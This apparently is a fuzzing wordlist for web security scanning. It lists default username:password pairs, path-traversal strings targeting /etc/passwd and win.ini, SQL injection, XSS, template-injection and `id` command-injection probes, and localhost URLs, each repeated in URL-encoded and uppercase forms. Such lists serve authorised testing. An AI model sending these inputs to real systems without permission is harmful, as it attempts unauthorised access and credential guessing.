admin:admin
admin:password
root:root
test:test
user:user
administrator:administrator
guest:guest
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
admin%3Aadmin
admin%3Apassword
root%3Aroot
test%3Atest
user%3Auser
administrator%3Aadministrator
guest%3Aguest
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
ADMIN:ADMIN
ADMIN:PASSWORD
ROOT:ROOT
TEST:TEST
USER:USER
ADMINISTRATOR:ADMINISTRATOR
GUEST:GUEST
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
ADMIN%3AADMIN
ADMIN%3APASSWORD
ROOT%3AROOT
TEST%3ATEST
USER%3AUSER
ADMINISTRATOR%3AADMINISTRATOR
GUEST%3AGUEST
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
admin:admin?v=0
admin:admin&v=0
admin%3Aadmin_0
defaultcreds_0
/defaultcreds/0
admin:admin%0a0
admin:password?v=1
admin:password&v=1
admin%3Apassword_1
defaultcreds_1
/defaultcreds/1
admin:password%0a1
